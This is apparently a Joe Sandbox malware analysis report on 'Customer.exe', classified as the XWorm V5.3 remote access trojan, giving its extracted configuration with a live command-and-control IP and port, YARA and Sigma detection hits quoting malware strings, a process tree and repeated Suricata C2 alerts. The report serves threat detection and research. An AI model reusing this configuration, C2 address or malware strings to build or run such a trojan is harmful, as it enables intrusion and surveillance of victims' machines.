Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Customer.exe

Overview

General Information

Sample name:Customer.exe
Analysis ID:1585444
MD5:e22d80df02163d375fa6a7b08700eb01
SHA1:05fbdaaad1ffbee891739f8a0df2cae8059d4011
SHA256:0dae41b10dc8aac507b9634de862384ee712c230f3ed1fed2075e5884ad75972
Tags:exemalwarexwormuser-Joker
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Customer.exe (PID: 7716 cmdline: "C:\Users\user\Desktop\Customer.exe" MD5: E22D80DF02163D375FA6A7B08700EB01)
    • csc.exe (PID: 7820 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6040.tmp" "c:\Users\user\AppData\Local\Temp\1ogmnitn\CSC1B46EB8E836240E48C8059BFB557429.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • WmiPrvSE.exe (PID: 7940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RuntimeBroker.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" MD5: F2CE039294AD313D2A9A84855C27341D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["147.124.210.158"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\RuntimeBroker.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x59e5:$str01: $VB$Local_Port
    • 0x59d6:$str02: $VB$Local_Host
    • 0x5ce6:$str03: get_Jpeg
    • 0x568e:$str04: get_ServicePack
    • 0x668a:$str05: Select * from AntivirusProduct
    • 0x6888:$str06: PCRestart
    • 0x689c:$str07: shutdown.exe /f /r /t 0
    • 0x694e:$str08: StopReport
    • 0x6924:$str09: StopDDos
    • 0x6a26:$str10: sendPlugin
    • 0x6aa6:$str11: OfflineKeylogger Not Enabled
    • 0x6c0c:$str12: -ExecutionPolicy Bypass -File "
    • 0x6d35:$str13: Content-length: 5235
    C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6dde:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6e7b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6f90:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6c50:$cnc4: POST / HTTP/1.1

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6bde:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6c7b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6d90:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6a50:$cnc4: POST / HTTP/1.1
      00000006.00000002.4116258187.00000000033A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Process Memory Space: RuntimeBroker.exe PID: 7332JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.0.RuntimeBroker.exe.fb0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            6.0.RuntimeBroker.exe.fb0000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x59e5:$str01: $VB$Local_Port
            • 0x59d6:$str02: $VB$Local_Host
            • 0x5ce6:$str03: get_Jpeg
            • 0x568e:$str04: get_ServicePack
            • 0x668a:$str05: Select * from AntivirusProduct
            • 0x6888:$str06: PCRestart
            • 0x689c:$str07: shutdown.exe /f /r /t 0
            • 0x694e:$str08: StopReport
            • 0x6924:$str09: StopDDos
            • 0x6a26:$str10: sendPlugin
            • 0x6aa6:$str11: OfflineKeylogger Not Enabled
            • 0x6c0c:$str12: -ExecutionPolicy Bypass -File "
            • 0x6d35:$str13: Content-length: 5235
            6.0.RuntimeBroker.exe.fb0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6dde:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6e7b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6f90:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6c50:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Customer.exe, ProcessId: 7716, TargetFilename: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer.exe", ParentImage: C:\Users\user\Desktop\Customer.exe, ParentProcessId: 7716, ParentProcessName: Customer.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , ProcessId: 7332, ProcessName: RuntimeBroker.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer.exe", ParentImage: C:\Users\user\Desktop\Customer.exe, ParentProcessId: 7716, ParentProcessName: Customer.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline", ProcessId: 7820, ProcessName: csc.exe
            Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Customer.exe, ProcessId: 7716, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeprird0.zzi.ps1
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Customer.exe, ProcessId: 7716, TargetFilename: C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer.exe", ParentImage: C:\Users\user\Desktop\Customer.exe, ParentProcessId: 7716, ParentProcessName: Customer.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline", ProcessId: 7820, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:02:21.470519+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:02:22.731373+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:02:31.531254+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:02:41.584888+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:02:51.649727+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:02:52.744766+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:01.709984+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:11.773035+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:16.556698+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:19.532695+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:19.788271+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:19.885303+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:20.047518+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:20.144450+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:20.340504+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:21.148835+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:22.752150+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:25.459917+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:31.353393+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:32.544878+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:35.649193+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:35.734503+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:35.794255+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:35.894075+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:39.882047+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:43.631936+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:46.287060+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:46.384121+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:52.753623+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:52.970947+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:56.366084+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:56.595362+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:01.102834+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:01.885521+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:02.132649+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:02.206572+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:02.304222+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:02.450626+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:02.547756+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:06.929899+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:12.522518+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:12.622846+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:16.759914+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:17.882005+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:18.006799+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:18.129376+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:18.170813+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:18.229088+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:18.267844+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:18.326290+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:22.760060+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:22.970896+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:23.598599+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:23.687515+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:23.749450+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:23.780429+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:23.843138+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:23.865979+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:23.922338+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:24.006294+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:24.019448+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:25.290955+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:34.131786+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:34.229904+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:34.330870+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:34.584806+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:44.366381+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:48.294416+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:51.087521+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:51.445097+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:52.777903+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:53.243054+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:55.928746+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:59.757336+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:59.811466+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:59.856341+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:59.989968+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:00.061594+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:00.087186+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:00.158539+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:01.851972+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:06.022447+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:08.163715+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:16.085092+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:16.139798+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:16.182714+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:16.237464+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:18.288326+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:22.774767+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:23.539446+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:26.355839+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:26.453120+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:31.415673+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:31.633644+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:31.730512+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:41.779688+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:45.287287+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.450010TCP
            2025-01-07T17:05:51.836271+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:52.227842+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:52.324889+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:52.452921+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:52.550046+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:52.782786+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:52.913622+010028528701Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:02:21.581245+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:02:31.533074+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:02:41.587228+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:02:51.651849+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:01.712273+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:11.774517+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:16.558381+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:19.535244+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:19.789739+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:19.886741+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:20.049033+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:20.151341+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:20.342428+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:21.150407+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:25.462721+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:31.355350+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:32.550467+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:35.651334+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:35.838968+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:35.895581+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:35.935798+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:35.982984+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:35.992980+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:36.031181+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:39.883789+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:43.634045+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:46.288726+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:46.390441+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:56.367852+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:03:56.597821+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:01.117493+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:01.902521+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:02.134419+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:02.208820+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:02.305984+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:02.452245+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:02.552404+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:02.683004+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:02.687954+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:06.936662+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:12.527347+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:12.626076+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:16.764418+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:17.883972+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:18.008561+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:18.130844+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:18.172343+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:18.230847+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
